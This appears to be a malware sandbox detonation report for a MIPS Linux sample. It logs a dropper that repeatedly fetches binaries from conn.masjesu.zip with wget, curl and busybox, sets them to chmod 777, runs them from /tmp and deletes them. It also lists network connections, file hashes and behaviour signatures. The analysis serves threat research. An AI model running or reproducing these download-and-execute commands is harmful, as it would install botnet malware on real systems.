[wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/chmod
[chmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN
[./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/bin/rm
[rm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/chmod
[chmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
[./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/bin/rm
[rm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/chmod
[chmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr
[./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/bin/rm
[rm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/chmod
[chmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij
[./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/bin/rm
[rm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/chmod
[chmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR
[./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/bin/rm
[rm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/chmod
[chmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK
[./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/bin/rm
[rm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/chmod
[chmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll
[./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/bin/rm
[rm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/chmod
[chmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv
[./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/bin/rm
[rm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/chmod
[chmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI
[./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/bin/rm
[rm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/chmod
[chmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4
[./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/bin/rm
[rm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/chmod
[chmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH
[./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/bin/rm
[rm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/chmod
[chmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD
[./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/bin/rm
[rm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/chmod
[chmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd
[./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
/bin/rm
[rm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 06:10
Reported
2024-11-21 06:13
Platform
debian9-mipsel-20240729-en
Max time kernel
72s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | N/A |
| N/A | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | N/A |
| N/A | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | N/A |
| N/A | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | N/A |
| N/A | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | N/A |
| N/A | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | N/A |
| N/A | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | N/A |
| N/A | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | N/A |
| N/A | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | N/A |
| N/A | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | N/A |
| N/A | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | N/A |
| N/A | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | N/A |
| N/A | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | N/A |
| N/A | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | N/A |
| N/A | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb | N/A |
| N/A | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | /tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN | N/A |
| N/A | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n | N/A |
| N/A | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr | N/A |
| N/A | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij | N/A |
| N/A | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR | N/A |
| N/A | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK | N/A |
| N/A | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll | N/A |
| N/A | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv | N/A |
| N/A | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI | N/A |
| N/A | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 | N/A |
| N/A | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH | N/A |
| N/A | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD | N/A |
| N/A | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
